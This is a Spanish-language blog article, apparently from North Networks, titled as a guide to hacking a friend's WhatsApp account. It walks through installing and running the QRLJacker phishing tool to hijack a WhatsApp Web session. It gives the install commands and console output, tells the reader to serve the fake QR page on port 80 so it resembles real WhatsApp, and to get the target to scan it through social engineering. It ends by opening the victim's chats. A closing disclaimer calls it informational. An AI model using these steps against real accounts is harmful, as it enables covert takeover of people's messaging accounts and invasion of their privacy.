HACKEAR LA CUENTA DE WHATSAPP DE TU AMIGO

  • Autor de la entrada:
  • Última modificación de la entrada:19 noviembre, 2021
  • Tiempo de lectura:5 minutos de lectura
  • Categoría de la entrada:Noticias

Los ataques de ingeniería social todavía funcionan. La mayoría de los atacantes utilizan métodos de ingeniería social para engañar a los objetivos. Según un investigador de hacking ético del instituto internacional de seguridad cibernética, los métodos de ingeniería social se utilizan en QRLJacker, una herramienta que se utiliza para obtener las sesiones web de la aplicación. Todo el programa está escrito en Python. Esta herramienta funciona según el principio de phishing. El phishing es un tipo de ataque de ingeniería social en el que se generan páginas de inicio de sesión o páginas de pago falsas para recopilar las credenciales de los usuarios.

QRLJacker es la herramienta más común utilizada en el secuestro de sesiones de WhatsApp que puede ser útil en la fase inicial de pentesting.

  • Para las pruebas, hemos utilizado Live Kali Linux 2019.4 amd64 . Mientras probaba QrlJacker a veces, QRLJacker no funcionaba en las versiones instaladas de Kali linux. Hemos probado el arranque en vivo de Kali Linux 2018.4 , 2018.3 y 2019.1 amd64 .
  • El controlador Geeko actúa como motor de navegador web utilizado en aplicaciones desarrolladas por Mozilla. Crea un enlace entre Selenium (un módulo de Python) y el navegador Mozilla. Para instalar, escriba wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
  • Escriba tar -xvzf geckodriver-v0.24.0-linux64.tar.gz y cambie el directorio al extraído.
  • Escriba sudo mv -f geckodriver / usr / local / share / geckodriver
  • Escriba sudo ln -s / usr / local / share / geckodriver / usr / local / bin / geckodriver
  • Escriba sudo ln -s / usr / local / share / geckodriver / usr / bin / geckodriver
  • Recuerde actualizar el navegador Firefox. Para ese tipo sudo apt-get update & sudo apt-get install firefox-esr
  • Escriba apt-get install python3.7
  • Escriba git clone https://github.com/OWASP/QRLJacking
  • Escriba python3.7 -m pip install -r requirements.txt
  • Escriba python3.7 QrlJacker.py
_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!
  • Ayuda de tipo
QrlJacker > help
General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os           Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.
  • Escriba lista y escriba use grabber / whatsapp
 QrlJacker > list
Name Description
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
  • Tipo de opciones y tipo de conjunto de puertos 1337
  • Escriba set host 192.168.1.7
QrlJacker Module(grabber/whatsapp) > set port 1337
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent

Escriba ejecutar , también puede ejecutar esto en el puerto 80 en lugar de 1337, para que parezca una página real de whatsapp

QrlJacker Module(grabber/whatsapp) > run  
QrlJacker Module(grabber/whatsapp) > run
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
  • Después de iniciar el servidor Qrljacker. Puede enviar este enlace a su objetivo. Para las pruebas, hemos abierto el código QrlJacker generado en Windows 7. Escriba 192.168.1.7:1337

  • Para su uso, hemos abierto en whatsapp 2.19.98. Escanea el código QR en Whatsapp web de tu móvil o pide a tu amigo que inicie sesión en whatsapp web utilizando técnicas de ingeniería social

  • Vaya a la terminal donde ha iniciado QrlJacker en Kali. Las sesiones de tipo mostrarán las cuentas de la aplicación Whats conectadas a las sesiones de QrlJacker.
QrlJacker Module(grabber/whatsapp) > sessions
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
  • A medida que escribe sesiones -i 0 , el navegador web Kali Linux se abrirá con la cuenta de Whatsapp de destino Primero abrirá web.whatsapp.com.

  • Pero después de 1 o 2 segundos se abrirá la cuenta de Whatsapp de destino.

  • Ahora puedes ver todo el chat de whatsapp.

Recuerde que este artículo fue elaborado con fines exclusivamente informativos, por lo que North Networks no se hace responsable del mal uso que pudiera darse a la información aquí contenida. Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en suscribirse para recibir las últimas noticias.

Comparte con tus amigos..

Share on facebook
Share on twitter
Share on linkedin
Share on telegram
Share on whatsapp
Share on email